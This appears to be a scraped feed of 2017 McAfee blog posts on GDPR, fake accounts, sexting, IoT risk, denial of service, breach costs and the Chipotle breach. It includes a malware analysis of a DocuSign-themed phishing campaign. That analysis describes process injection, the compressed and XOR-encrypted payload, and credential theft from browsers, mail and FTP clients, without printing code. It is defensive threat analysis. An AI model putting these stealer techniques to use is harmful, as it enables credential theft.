Statistiquement, plus de la moitié des violations de données sont détectées par un tiers. Le RGPD exige de l’entreprise victime d’un tel incident — la vôtre, en l’occurrence — qu’elle le signale à l’autorité de contrôle compétente au plus tard 72 heures après en avoir pris connaissance. Il est donc primordial d’être en mesure de déceler les violations de données potentielles et de disposer d’un plan de réponse éprouvé à l’aide de simulations. Demandez à votre fournisseur de services de cloud s’il peut assurer ces fonctions via un centre SOC ou CSIRT, dont il dispose éventuellement en interne ou auquel il a accès sous forme de service managé.

 

Où conservez-vous et traitez-vous les données collectées ?

L’endroit où résident les données est probablement la principale préoccupation lorsqu’il est question de services de cloud et de préparation au RGPD. Votre fournisseur de services de cloud dispose-t-il de centres de données dans l’Union européenne ou uniquement aux États-Unis ? Où stocke-t-il et traite-t-il ses données ? Sont-elles déplacées de l’UE vers les États-Unis ? Ces quelques interrogations peuvent trouver réponse en mettant en œuvre des mesures adéquates de chiffrement des données au repos, de contrôle de l’accès et de gestion des clés.

 

Bien que la liste de questions ci-dessus ne soit pas exhaustive, elle résume très bien les éléments à prendre en considération lors d’une discussion avec un fournisseur de services de cloud au sujet du RGPD. Espérons que cette lecture vous aidera à prendre des décisions plus avisées en tant qu’utilisateur de ces services et à vous engager sur la voie de la préparation au RGPD. Mais plus important encore, ces conseils vous permettront certainement de migrer vers le cloud en toute sécurité.

The post Se préparer au RGPD en 2017 – Troisième partie : principales questions à poser à votre fournisseur de services de cloud appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/languages/francais/se-preparer-au-rgpd-en-2017-troisieme-partie-principales-questions-poser-votre-fournisseur-de-services-de-cloud/feed/ 0
Curbing The Threat Of Fake Accounts https://securingtomorrow.mcafee.com/consumer/curbing-threat-fake-accounts/ https://securingtomorrow.mcafee.com/consumer/curbing-threat-fake-accounts/#respond Tue, 06 Jun 2017 15:24:14 +0000 https://securingtomorrow.mcafee.com/?p=74795 My bubbly teen was so excited the day she found Priyanka Chopra had started following her on Twitter. She was literally hopping around the room, squealing in delight. As a parent and my daughter’s cybersafety guide, I checked her page to confirm and what I saw made me sad but I had to burst her …

The post Curbing The Threat Of Fake Accounts appeared first on McAfee Blogs.

]]>
My bubbly teen was so excited the day she found Priyanka Chopra had started following her on Twitter. She was literally hopping around the room, squealing in delight. As a parent and my daughter’s cybersafety guide, I checked her page to confirm and what I saw made me sad but I had to burst her bubble.

No darling, that’s not the real Priyanka Chopra following you but a fake twitter account. See here @priyankachopra ‏, this is her original handle. And see this blue tick – it means Twitter has validated this account to be a genuine one as it usually verifies popular accounts.”

“Why do people create fake accounts then?” ranted the peeved teen, as she angrily blocked the fake handle. (It’s painful to lose a celeb follower on social media you know.)

Why indeed? Why do people create false accounts on social media sites like Twitter, Instagram, LinkedIn and Facebook? For the same reason why we have fakes/imitations in the real world; someone stands to gain from it, or leverage it to make mischief.

Are the number of fake accounts significant enough to warrant attention and action? It apparently is. According to a research carried out by a graduate student at UCL recently, there are more than 500,000 fake accounts on Twitter alone, for instance, Deepika Padukone’s account (@Deepika_Officia). Fake LinkedIn accounts of company CEOs is a common way to fraud job seekers signing up on the site. Another big fake account source is the duplication of celebrity accounts and hapless fans often end up following the fake account online. These can do major harm by sharing false or inappropriate content. Fake accounts are also created to boost follower counts, share incendiary or dishonest messages, create trending topics, send spam, troll and abuse users, launch scam or phishing attacks or set traps for naïve children.

Fake account creators bank on the intrinsic trusting nature of users that lead them to believe in the authenticity of an account. They leverage this trust to swindle, bully, defame the person or others. So, the thing to do is to be skeptical and vigilant.

Identifying fake accounts on social media:

This is not an easy task by any means, but still we need to be vigilant to avoid risks. Here are a few pointers that will help you stay safer online:

  • Absent: The account does not engage in real-time conversations much
  • Mechanic: Repeats a single message and tags several accounts at random
  • Agenda: Shares false, inappropriate or suspicious content consistently. Sometimes engages in trolling or bullying and apart from it, does not share any tangible storyline or views
  • Inadequate identity: A Twitter handle without a profile image
  • Imposters: New friend requests from existing friends, not to mention those suspicious favors asked online. The moment you come across a duplicate or fake account, flag and report it. That way the sites would know of its existence and take remedial actions. And never be in a hurry to accept friend/follow requests. Take your time. Check the account profile, posts and friend list. Then decide. Do not trust blindly- each new friend or follower need to earn your trust before you interact with the account. Remember to be a true Doubting Thomas when online. STOP. THINK. CONNECT.

The post Curbing The Threat Of Fake Accounts appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/curbing-threat-fake-accounts/feed/ 0
Helping Kids Understand the Foolishness and Consequences of Sexting https://securingtomorrow.mcafee.com/consumer/family-safety/helping-kids-understand-foolishness-consequences-sexting/ https://securingtomorrow.mcafee.com/consumer/family-safety/helping-kids-understand-foolishness-consequences-sexting/#respond Tue, 06 Jun 2017 14:00:49 +0000 https://securingtomorrow.mcafee.com/?p=74655 Sexting and teens. Nearly every week, the headlines reflect the attempt of citizens, educators, and lawmakers to tackle the question: What should the punishment be for teens caught sexting? In most states, officials may prosecute anyone, regardless of age, who creates, distributes or possesses an image of a minor engaged in sexual acts under that state’s …

The post Helping Kids Understand the Foolishness and Consequences of Sexting appeared first on McAfee Blogs.

]]>
Sexting and teens. Nearly every week, the headlines reflect the attempt of citizens, educators, and lawmakers to tackle the question: What should the punishment be for teens caught sexting?

In most states, officials may prosecute anyone, regardless of age, who creates, distributes or possesses an image of a minor engaged in sexual acts under that state’s pornography laws. And, if convicted, that person is required to register as a sex offender. Currently, laws vary state to state (check your state’s laws here).

However, as sexting becomes more socially widespread among teens — some even calling it an “epidemic,” — many consider the felony charge of trafficking child pornography too stiff a penalty for minors, especially in cases where sexting is consensual.

Such was the case in Illinois when officials charged two students with possession of child pornography following a sexting scandal at a suburban middle school. More recently, a group of Kentucky teens was accused of circulating more than 140 nude photos of teens in their peer group.

Chances are the middle and high school students charged weren’t thinking about prison time when they hit “send” on their phones and became part of a crime. States across the country such as Colorado and Tennessee whose lawmakers want sexting offenses to be treated as misdemeanors or infractions such as skipping school or violating curfew.

The dialogue around the issue is robust for sure because sexting can be wanted or unwanted. Concerns about sex trafficking, cyberbullying, and privacy rights of minors face off against passionate citizen groups and lawmakers who claim that that the sexting lesson needs to happen but not through the criminal justice system.

While each state wrestles how to reshape its laws, the conversation around the dinner table for families is more important than ever. Don’t wait for something to happen to bring up sexting. Talk candidly and firmly to your kids about the proper and legal use of their cell phones.

Sexting: Family Talking Points

1. Nothing is private. Nothing. Once you send an intimate photo, you’ve lost control over it, and you never know where it’s going to end up. Just. Don’t. Do. It.

2. It’s a felony. Underaged sexting — as common and acceptable as teens claim it to be — is still a crime. Felony charges and sex offender status for possessing and sharing photos of underaged males or females is still a possibility.

3. Responsibility. With great power comes great responsibility. Poor decisions on social media can have broad, far-reaching consequences as comedian Kathy Griffin recently reminded us all. Kids who own mobile phones must exhibit responsible behavior and understand the consequences of misusing technology. Encourage kids to delete any inappropriate photos they receive immediately.

4. Revenge is real. When feelings of rejection, betrayal, or jealousy mix with teen angst and technology, the results can be devastating. Revenge porn — when someone shares once private photos out of anger — is a very real consequence of sexting. Talk to kids about the risks and that even the most trusted relationships can take unexpected turns. The best practice: Never sext. Ever.

5. Empathize. Kids sext for different reasons; some to show off or joke around, others to win someone’s affection or to prove their commitment. Listen to your child and empathize with the social pressure he or she faces daily. Let your child know that everyone wants to be accepted, but real friends don’t require intimate photos to build a relationship. Discuss different ways to respond to that pressure that will help them steer clear of sexting.

6. Extend grace. Everyone makes mistakes — it’s part of growing up. Let your kids know that if they’ve been on either side of the sexting equation, they can make it right by deleting all photos and committing to never doing it again. Familiarize yourself with signs your teen may be sexting and the texting slang used to do it. Encourage your child to find his or her worth outside of what peers may be doing.

7. Think big picture. It’s easy for kids to get caught up in the moment and make impulsive decisions. Talk to kids about the big picture. Ask: What if one hasty decision came back to haunt you years down the road? What if one decision cost you a scholarship, a relationship, or even a job? What if the person you send a photo to loses his or her phone? What if a friend, parent, or teacher scrolls through your friend’s phone and sees the intimate picture? What if a “trusted” friend or relationship changes? Watch the sexting and cyberbullying video, “Exposed” and discuss.

 

 

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @IntelSec_Family. (Disclosures).

The post Helping Kids Understand the Foolishness and Consequences of Sexting appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/family-safety/helping-kids-understand-foolishness-consequences-sexting/feed/ 0
A lack of IoT security is scaring the heck out of everybody https://securingtomorrow.mcafee.com/business/optimize-operations/a-lack-of-iot-security-is-scaring-the-heck-out-of-everybody/ Mon, 05 Jun 2017 20:00:18 +0000 https://securingtomorrow.mcafee.com/?p=74765 Enterprises aren’t yet managing the risks posed by the swelling wave of IoT technology very well, according to a study released by the Ponemon Institute. The study, which surveyed 553 enterprise IT decision-makers, found that 78% of respondents thought that it was at least somewhat likely that their organizations would experience data loss or theft …

The post A lack of IoT security is scaring the heck out of everybody appeared first on McAfee Blogs.

]]>
Enterprises aren’t yet managing the risks posed by the swelling wave of IoT technology very well, according to a study released by the Ponemon Institute.

The study, which surveyed 553 enterprise IT decision-makers, found that 78% of respondents thought that it was at least somewhat likely that their organizations would experience data loss or theft enabled by IoT devices within the next two years.

The fact that a lot of small-scale connected devices and other parts of the Internet of Things are highly insecure has been frightening IT departments for a long time. On their own, IoT gadgets aren’t particularly tempting targets, so manufacturers don’t fuss too much about security. In great numbers – and Gartner said recently that it estimates there are 8.4 billion connected devices active this year – swathes of easily compromised IoT gizmos can make for a formidable botnet, as the Mirai botnet showed in 2016.

Yet, in a lot of places, it can be difficult to put policies in place to neutralize this threat. Nearly three respondents in four – 72% – said that the speed at which IoT technology advances makes it harder to keep up with evolving security requirements. Almost as many said that new strategies are needed to cope with the problem.

Those strategies are difficult to design, according to the Ponemon study. Just 44% of respondents told researchers that their enterprise has the ability to protect itself and its network from IoT devices. Less than half said that they specifically monitor the risk posed by devices being used in the workplace.

Another big factor in the generally poor state of IoT management is organization – of the 50% or so of companies that didn’t track IoT inventory, fully 85% said that there is a lack of centralized responsibility for those devices, and over half cited a lack of resources available to perform this task.

Nevertheless, respondents at least recognize the need for a new way of thinking about IoT management – two-thirds said that “a new approach” is necessary for IT departments coping with IoT.

 

This article was written by Jon Gold from NetworkWorld and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

The post A lack of IoT security is scaring the heck out of everybody appeared first on McAfee Blogs.

]]>
Denial Of Service Is A Growing Threat: How Can You Better Protect Your Business? https://securingtomorrow.mcafee.com/business/neutralize-threats/denial-of-service-is-a-growing-threat-how-can-you-better-protect-your-business/ Fri, 02 Jun 2017 19:46:29 +0000 https://securingtomorrow.mcafee.com/?p=74753 Earlier this month, I wrote on the changing face of cybersecurity, and last week I wrote a blog on recent high-profile security attacks, and what lessons we can take away from them. Today, as part of our ongoing series on security, I wanted to take a deeper dive into the different kinds of Denial of …

The post Denial Of Service Is A Growing Threat: How Can You Better Protect Your Business? appeared first on McAfee Blogs.

]]>
Earlier this month, I wrote on the changing face of cybersecurity, and last week I wrote a blog on recent high-profile security attacks, and what lessons we can take away from them. Today, as part of our ongoing series on security, I wanted to take a deeper dive into the different kinds of Denial of Service attacks (DoS), and what enterprises need to do in order to better secure themselves from this growing threat. We’ve touched on the topic a few times in the last several blogs, but there’s a fair amount more to chew on here.

Three kinds of DoS – classic, DDoS, PDoS

First off, there are three different main variations on DoS attacks, all of which are distinct from traditional data theft or information loss (though those attacks may happen as a result of DoS). While the industry tends to disagree a bit about the proper acronyms to use, the underlying concepts are widely agreed upon – here’s the rundown, using the nomenclature we typically use at Moor Insights & Strategy. First, the classic Denial of Service attack, referred to simply as DoS. This attack refers to when a server made inaccessible by either overloading it with traffic, or compromising the firmware. A slight twist on this is that sometimes a server with compromised firmware can technically still be available, but being used simultaneously by a baddie for criminal purposes. This is a particularly sinister threat, because users might not immediately realize that they’ve been compromised. 

Next up, we’ve got the Distributed Denial of Service, or DDoS. This form of DoS occurs when a server is attacked from many different locations – making it incredibly difficult to pinpoint where exactly the attack is coming from. You’ve probably been hearing lot about this one – the recent gigantic Mirai-Dyn attack falls under this category. In that case, experts believe that the Mirai bot targeted IoT devices with unsecured IoT devices and out-of-date firmware, and transformed it into a huge botnet that overloaded traffic into Dyn. This was one of those attacks that we in the industry see as a harbinger of things to come – with the proliferation of IoT and edge devices, the threat surface is growing and becoming increasingly vulnerable to attacks of this nature.

The third, and final form of DoS is what we call Permanent Denial of Service, or PDoS. This occurs when a server or device is compromised (often at the firmware level), to the extent that it becomes impossible to recover. No way to revive it back into operation, just plain dead. Referred to colloquially as a “brick,” these sorts of serious attacks are on the rise. In an interesting twist, there’s a new malware strain that’s popped up that seems to be intentionally “bricking” unsecured IoT devices – seemingly to take them off the table to prevent the spread of Mirai-like malware. It may be the work of a well-intentioned vigilante, but it’s still PDoS and a huge headache for those who are being permanently iced out from their devices.

What can you do to better protect yourself?

As we’ve discussed before, security is a constantly moving target and the players, techniques and remedies change over and over. Compute clients and networks were the soft spot five years ago but now it’s the server. Hackers go after the soft spots.

First the obvious – businesses need to make sure their firmware is up to date, and make sure all the default passwords on their devices have been changed. These common blind spots are known to cyber-criminals, and they will be taken advantage of. But as I’ve written before, security measures must go deeper than that – they have to be incorporated into the blueprint of their products, down to the hardware and firmware. For an enterprise to truly be secure, it needs to beef up measures on all fronts – hardware must be strengthened, AI should be leveraged to quickly and more effectively detect anomalies, and encryption must be extended to the component level. If an enterprise’s security strategy is not holistic, it’s not a matter of if a cybercriminal will breach its defenses, but when. These measures will do much to protect enterprises from DoS attacks, as well as more traditional threats. 

Last but not least, security must be extended to partners and the supply chain. This is an area that is often overlooked from a security standpoint and vulnerable. Access to firmware must be strictly controlled every step of the way. Enterprises have to properly vet and verify the companies they do business with to make sure that they are not exposed to malware and counterfeit materials at any juncture. Even Apple reportedly, according to Ars Technica, fell victim to an attacker on the supply chain level – a fake firmware patch made its way in via Supermicro, a server supplier (which you can read about here). Even the biggest, most secure companies are struggling with this blind spot, and that has to change.

Wrapping up

DoS attacks are ramping up, and it’s important to know what they are and how they could potentially affect your enterprise. They can kill productivity and cause massive downtime, such as the Mirai-Dyn incident, or they can open the door to data theft and information loss and even ruin your hardware. Right now it’s a hacker’s playground out there, with unsecured devices popping up left and right and most enterprises still struggling to devise effective, holistic security strategies to address the expanding threat surface and changing characteristics. This is a problem that’s only going to get worse unless the right measures are taken, and soon.

Disclosure: My firm, Moor Insights & Strategy, like all research and analyst firms, provides or has provided research, analysis, advising, and/or consulting to many high-tech companies in the industry, which may be cited in this article. I do not hold any equity positions with any companies cited in this column.

Note: Moor Insights & Strategy technical writer Walker Pickens contributed to this article.

 

This article was written by Patrick Moorhead from Forbes and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

The post Denial Of Service Is A Growing Threat: How Can You Better Protect Your Business? appeared first on McAfee Blogs.

]]>
New Report Quantifies Time’s Impact on Costs of Data Breaches and Disruption Attacks https://securingtomorrow.mcafee.com/business/new-report-quantifies-times-impact-costs-data-breaches-disruption-attacks/ https://securingtomorrow.mcafee.com/business/new-report-quantifies-times-impact-costs-data-breaches-disruption-attacks/#respond Fri, 02 Jun 2017 04:00:41 +0000 https://securingtomorrow.mcafee.com/?p=74711 New analysis from the Aberdeen Group, based on data provided by Verizon, provides fresh evidence quantifying the cost of time in two different incident types: data compromises and sustained disruption in service availability. These findings underscore the urgency for cybersecurity practitioners to minimize detection and containment time. According to the McAfee commissioned report by Aberdeen, …

The post New Report Quantifies Time’s Impact on Costs of Data Breaches and Disruption Attacks appeared first on McAfee Blogs.

]]>
New analysis from the Aberdeen Group, based on data provided by Verizon, provides fresh evidence quantifying the cost of time in two different incident types: data compromises and sustained disruption in service availability. These findings underscore the urgency for cybersecurity practitioners to minimize detection and containment time.

According to the McAfee commissioned report by Aberdeen, Cybersecurity: For Defenders, It’s About Time, the business impact from a data breach is the greatest at the beginning of the exploit, when records are first compromised. That’s logical, since attackers want to get in and out with the goods (your data) in as little time as possible. Most responders are closing the barn door well after the horse has gone, when most of the damage has already been done.

However, in contrast, the business impact from a sustained disruption in availability continues to grow from the time of compromise to the time of remediation. As illustrated below, a 2X improvement in your time to detect and respond to an attack translates to a roughly 70 percent lower business impact.

Aberdeen Group concludes that time to detection remains a top challenge for defenders responding to cyberattacks, putting enterprises at risk. The report discusses that in more than 1,300 data breaches, investigated between 2014 and 2016, half of detections took up to 38 days, with a mean average of 210 days, an average skewed by some incidents taking as long as four years.

This data shows that cybersecurity practitioners can improve their ability to protect business value if they can implement strategies that prioritize faster detection, investigation, and response to incidents.

Recommendations

In the study, Aberdeen Group provides four illustrative examples of how recapturing an advantage of time can help defenders to reduce their risk, with suggestions on countermeasures and counterstrategies. Some highlights include use of the latest identification and containment technologies:

  • Before zero-day: identification (e.g., through reputation, heuristics, and machine learning). Attackers have become increasingly adept at morphing the footprint of their malicious code, to evade traditional signature-based defenses. But advanced pre-execution analysis of code features, combined with real-time analysis of code behaviors, are now being used to identify previously unknown malware without the use of signatures, before it has the opportunity to execute.
  • After identification: containment (e.g., through dynamic application protection, and aggregated intelligence into active threat campaigns). Advanced endpoint defense capabilities now allow potentially malicious code to load into memory — but block it from making system changes, spreading to other systems, or other typically malicious behaviors. This approach provides immediate protection, and buys additional time for intelligence —gathering and analysis — without disrupting user productivity.

For data center and cloud security, some of the above endpoint tactics can be applied to server and virtual workloads to protect against both known and unknown exploits. Aberdeen Group also suggests you can improve your results through shielding and virtual patching tactics. This concept has been around for years, but is especially helpful when assets are centralized.

  • Virtual patching: Sometimes known as external patching or vulnerability shielding — establishes a policy that is external to the resources being protected, to identify and intercept exploits of vulnerabilities before they reach their intended target. In this way, direct modifications to the resource being protected are not required, and updates can be automated and ongoing.
  • Strategic enforcement points: Design using fewer policy enforcement points (i.e., at selected points in the enterprise network, as opposed to taking the time to apply vendor patches on every system)

As an industry, we are spending more and working harder to shorten the time advantage of the attacker. Modern tools and thoughtful practices in endpoint and data center infrastructure complement the analytics and automation investments that are transforming the Security Operations Center (SOC), technologies such as anomaly detection and threat intelligence correlation.

This report shows that we still have work to do, and provides evidence for CIOs and the board that there’s a clear business incentive to continue to act.

To read the full report, visit https://mcafee.ly/2r0VNBq.

The post New Report Quantifies Time’s Impact on Costs of Data Breaches and Disruption Attacks appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/new-report-quantifies-times-impact-costs-data-breaches-disruption-attacks/feed/ 0
Chipotle removes malware after breach strikes payment systems https://securingtomorrow.mcafee.com/business/neutralize-threats/chipotle-removes-malware-after-breach-strikes-payment-systems/ Thu, 01 Jun 2017 22:39:15 +0000 https://securingtomorrow.mcafee.com/?p=74733 (Bloomberg) – Chipotle Mexican Grill Inc., which warned investors and customers last month that it had suffered a data breach, gave the all-clear on Friday, saying it had removed malicious software from its systems. The company identified the so-called malware during a probe that included law enforcement, payment-card networks and cybersecurity firms, the burrito chain …

The post Chipotle removes malware after breach strikes payment systems appeared first on McAfee Blogs.

]]>
(Bloomberg) – Chipotle Mexican Grill Inc., which warned investors and customers last month that it had suffered a data breach, gave the all-clear on Friday, saying it had removed malicious software from its systems.

The company identified the so-called malware during a probe that included law enforcement, payment-card networks and cybersecurity firms, the burrito chain said. Hackers installed the software in order to grab customer data from point-of-sale devices, striking between March 24 and April 18.

“The malware searched for track data (which sometimes has cardholder name in addition to card number, expiration date and internal verification code) read from the magnetic stripe of a payment card as it was being routed through the POS device,” Chipotle said in a statement. “There is no indication that other customer information was affected.”

The data breach was the latest setback for a company that has struggled to revive growth. An E. Coli scare in late 2015 sent its sales and stock price plunging. To win back customers, the Denver-based chain has rolled out a new ad campaign and free-food offers. The company also shook up its board after being targeted by activist investor Bill Ackman.

Same-store sales began to recover last quarter after declining for five straight periods, raising hope that a turnaround is underway.

On Friday, Chipotle warned customers to check their credit-card statements for unauthorized charges and “remain vigilant to the possibility of fraud.”

 

This article was written by Nick Turner from Information Management and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

The post Chipotle removes malware after breach strikes payment systems appeared first on McAfee Blogs.

]]>
Misuse of DocuSign Email Addresses Leads to Phishing Campaign https://securingtomorrow.mcafee.com/mcafee-labs/misuse-of-docusign-email-addresses-leads-to-phishing-campaign/ https://securingtomorrow.mcafee.com/mcafee-labs/misuse-of-docusign-email-addresses-leads-to-phishing-campaign/#respond Thu, 01 Jun 2017 21:23:45 +0000 https://securingtomorrow.mcafee.com/?p=74198 DocuSign, which provides electronic signatures and digital transaction management, reported that email addresses were stolen by an unknown party on May 15. Although the company confirmed that no personal information was shared, DocuSign has reported that a malicious third party gained temporary access to a separate, non-core system that allows it to communicate service-related announcements to …

The post Misuse of DocuSign Email Addresses Leads to Phishing Campaign appeared first on McAfee Blogs.

]]>
DocuSign, which provides electronic signatures and digital transaction management, reported that email addresses were stolen by an unknown party on May 15. Although the company confirmed that no personal information was shared, DocuSign has reported that a malicious third party gained temporary access to a separate, non-core system that allows it to communicate service-related announcements to users via email. This incident has left a lot of DocuSign individual users and business professionals vulnerable, because the attacker group is trying to exploit the users through phishing emails. Users are receiving mails on their corporate email IDs, in which they are asked to review and sign job-related documents such as accounting invoices, by clicking on the “Review Document” hyperlink in the malicious documents.

Spam email.

The phishing link downloads a document file consisting of malicious code, which when opened injects malware in the system’s process svchost.exe.

Process injection.

The injected process sends a request to the following URLs:

Contacting the remote host.

The malware receives the response:

Response from server.

The response is an encrypted file that could be any of three types:

  • DLL: The common password stealer Pony Loader, aka Fareit.
  • EXE: A similar variant known as Evil Pony.
  • EXE ZLoader: For loading exploit kits and other malware.

The compressed and encrypted stealer component.

The files are aplib compressed and XOR encrypted. The download has to first be decompressed and then decrypted. The first 8 bytes of the file are the XOR key.

The decrypted stealer component.

The DLL file uses a lot of anti-debugging techniques to avoid analysis. It also creates a mutex to avoid its own multiple instances running on the same machine.

Creating the mutex.

The DLL, Pony Loader, steals the username, password, and other information. The following screenshots show code for stealing user credentials from Chrome and Outlook.

Code for stealing Chrome credentials.

Code for stealing Outlook credentials.

The EXE, Evil Pony, steals credentials from FileZilla:

Code for stealing FileZilla credentials.

Once downloaded, these malware monitor a user’s keystrokes, capture personal information such as usernames and passwords, and send this information to the malware originator.

DocuSign has reported that they have taken quick measures to block the unauthorized access and have added further security to their systems. The company has also advised its users to keep their antimalware software updated.

McAfee urges all customers to ensure McAfee’s DAT updates have been applied to ensure the latest protection. We advise customers to be diligent in applying security updates for all the software they use.

SHA256 hashes of the analyzed samples:

  • fff786ec23e6385e1d4f06dcf6859cc2ce0a32cee46d8f2a0c8fd780b3ecf89a: W97M/Dropper.cu
  • 5bcd2d8ed243d6a452d336c05581291bc63ee489795e8853b9b90b5f35c207d8: RDN/Generic PWS.y
  • 437351c9ae0a326ed5f5690e99afc6b723c8387f1ed87c39ebcce85f9103c03a: Fareit-FCH
  • 9f346deed73194928feda785dca92add4ff4dd19fbc1352cebaa6766e0f69a38: Generic PWS.o

The post Misuse of DocuSign Email Addresses Leads to Phishing Campaign appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/mcafee-labs/misuse-of-docusign-email-addresses-leads-to-phishing-campaign/feed/ 0
Vorbereitung auf die Datenschutz-Grundverordnung 2017, Teil 2: Schaffung einer Kultur des Datenschutzes und der konzeptionellen Sicherheit https://securingtomorrow.mcafee.com/languages/german/vorbereitung-auf-die-datenschutz-grundverordnung-2017-teil-2-schaffung-einer-kultur-des-datenschutzes-und-der-konzeptionellen-sicherheit/ https://securingtomorrow.mcafee.com/languages/german/vorbereitung-auf-die-datenschutz-grundverordnung-2017-teil-2-schaffung-einer-kultur-des-datenschutzes-und-der-konzeptionellen-sicherheit/#respond Wed, 31 May 2017 21:59:29 +0000 https://securingtomorrow.mcafee.com/?p=75167 Dies ist der zweite Teil einer Reihe von Blog-Beiträgen, mit denen Sicherheitsverantwortliche und Führungskräfte in Unternehmen auf die Datenschutz-Grundverordnung (DSGVO) 2017 vorbereitet werden sollen.   Denken Sie bei der neuen EU-Datenschutz-Grundverordnung (DSGVO) nicht in erster Linie an Bußgelder. Denken Sie dabei an die Schaffung einer Kultur des Datenschutzes und der konzeptionellen Sicherheit. Was bedeutet das? …

The post Vorbereitung auf die Datenschutz-Grundverordnung 2017, Teil 2: Schaffung einer Kultur des Datenschutzes und der konzeptionellen Sicherheit appeared first on McAfee Blogs.

]]>
Dies ist der zweite Teil einer Reihe von Blog-Beiträgen, mit denen Sicherheitsverantwortliche und Führungskräfte in Unternehmen auf die Datenschutz-Grundverordnung (DSGVO) 2017 vorbereitet werden sollen.

 

Denken Sie bei der neuen EU-Datenschutz-Grundverordnung (DSGVO) nicht in erster Linie an Bußgelder. Denken Sie dabei an die Schaffung einer Kultur des Datenschutzes und der konzeptionellen Sicherheit.

Was bedeutet das? Bei diesem Ansatz geht es zwar um den Schutz persönlicher Daten und um Cyber-Sicherheit, doch dies umfasst viel mehr als persönliche Daten und Technologie. Nur weil das „D“ in DSGVO für „Daten“ steht, können Sie nicht einfach eine Lösung zum Schutz vor Datenkompromittierungen (DLP) aktivieren und die Arbeit dann als erledigt betrachten. Auch mit einem technologieorientierten Ansatz – und verstehen Sie mich bitte nicht falsch, der vermehrte Einsatz von DLP-Technologie ist durchaus eine gute Sache – muss sich jedes Unternehmen dennoch Gedanken machen über die davon betroffenen Geschäftsprozesse, die davon betroffenen Prozesse zur Erkennung von Kompromittierungen, die Mitarbeiter, die diese Technologie anwenden, und die Personen, deren Daten verarbeitet werden – denn sie sind einem persönlichen Risiko ausgesetzt.

Lassen Sie uns kurz bei den Mitarbeitern bleiben. Innerhalb eines Unternehmens muss man im Blick haben, inwieweit die verschiedenen Rollen davon betroffen sind. Dies reicht vom allgemeinen Nutzer bis hin zu Nutzern mit erhöhten Berechtigungen, leitenden Angestellten und Führungskräften.

Was die Geschäftsprozesse betrifft, muss man sich fragen, welche Datenflüsse es gibt und was von der Erfassung, Speicherung und Nutzung persönlicher Daten betroffen ist. Es müssen geeignete Technologien und Verfahrenskontrollen vorhanden sein.

Um all dies umsetzen zu können, müssen Rahmenbedingungen wie die folgenden zur Anwendung kommen. Denken Sie zunächst an die Sicherheitsstrategie im Hinblick auf Governance, Mitarbeiter, Prozesse und Technologie. Dann bedenken Sie die erforderlichen Sicherheitsergebnisse, um für die DSGVO gerüstet zu sein, sowie die entsprechenden Lösungen.

 

Prüfung der Sicherheitsstrategie

Angesichts dieser neuen Verordnung hängt die Messlatte für Datenschutz innerhalb eines Unternehmens definitiv höher. Die Vorbereitung auf die verschiedenen Sicherheits- und Meldebestimmungen der neuen Verordnung – innerhalb eines vernetzten, dynamischen digitalen Unternehmens – erfordert eine ganzheitliche Prüfung der Sicherheitsstrategie hinsichtlich Governance, Mitarbeitern, Prozessen und Technologie:

  • In vielen Fällen muss zur Vorbereitung auf die neue Verordnung zunächst ein Datenschutzbeauftragter ernannt werden, der für die Einhaltung der Vorschriften und die Kommunikation mit den Aufsichtsbehörden verantwortlich ist. Darüber hinaus erfordert die DSGVO in Anbetracht der hohen Geldbußen bei Verstößen die Aufmerksamkeit der Unternehmensführung, sodass wohl neue interne Berichtsstrukturen geschaffen werden müssen und eine Kultur der kontinuierlichen Compliance erforderlich ist. Diese Strukturen sind für die Entwicklung eines erfolgreichen, langfristigen Datenschutzprogramms unerlässlich.
  • Innerhalb eines Unternehmens trägt jeder Einzelne Verantwortung für die Datensicherheit, nicht nur die Personen im Sicherheitsbereich. Es ist wichtig, dass alle Mitarbeiter, angefangen bei den Führungskräften bis hin zu Nutzern, Administratoren und Entwicklern, im Schutz von Daten geschult werden und bereit für die Herausforderungen sind, wenn abgekürzte Verfahren vorgeschlagen werden. Wenn man die Mitarbeiter als Teil der Lösung betrachtet, und nicht als Teil des Problems, hilft dies bei der Entwicklung einer Kultur der konzeptionellen Sicherheit und des Datenschutzes.
  • Mehrere wichtige Sicherheits- und Geschäftsprozesse sollten im Hinblick auf deren Anwendbarkeit und die derzeitigen Fähigkeiten geprüft werden. Bei dieser Prüfung sollte man sich eingehend mit Datenflüssen, der Datenerfassung, -verarbeitung, -speicherung und -verwaltung befassen, um das Ausmaß des Problems zu verstehen. Wichtige Datenschutzprozesse umfassen die Klassifizierung und Überwachung sowie die Anwendungsentwicklung und Sicherheitsprüfung.
  • Wir sollten über ein Sicherheitssystem nachdenken, das den Schutz gespeicherter, übertragener oder verwendeter Daten ermöglicht und eine schnelle Erkennung und Reaktion auf Kompromittierungen gewährleistet. Unternehmen sollten prüfen, ob ihre derzeitige erstklassige Sicherheitstechnologiestrategie die erforderliche Effektivität bietet, um mit neuen Bedrohungen Schritt halten zu können, und die betriebliche Effizienz ermöglicht, die zur Einhaltung der Budgetvorgaben erforderlich ist.

 

Messung der Sicherheitsergebnisse

Um bewerten zu können, ob man für die DSGVO hinreichend gerüstet ist, muss das aktuelle Sicherheitsprogramm des Unternehmens geprüft werden. Die folgenden Cyber-Sicherheitsergebnisse sind für jedes Unternehmen, das einen digitalen Wandel vollzieht, von kritischer Bedeutung und stellen die Hauptsäulen für die Vorbereitung auf die DSGVO dar. Ihre Sicherheitslösungen müssen dafür sorgen können, dass die technischen Bausteine von Endgeräten, Netzwerken, der Cloud und von Sicherheitskontrollzentren als abgestimmtes System zusammenarbeiten, um die erforderlichen Funktionen zur Vorbeugung, Erkennung und Reaktion bereitzustellen, sodass die wichtigsten Ergebnisse erzielt werden können.

